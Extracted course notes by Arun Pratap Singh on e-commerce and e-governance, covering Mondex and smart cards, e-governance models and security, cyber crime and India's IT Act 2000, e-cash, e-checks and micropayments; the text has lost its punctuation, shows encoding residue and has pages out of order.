however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
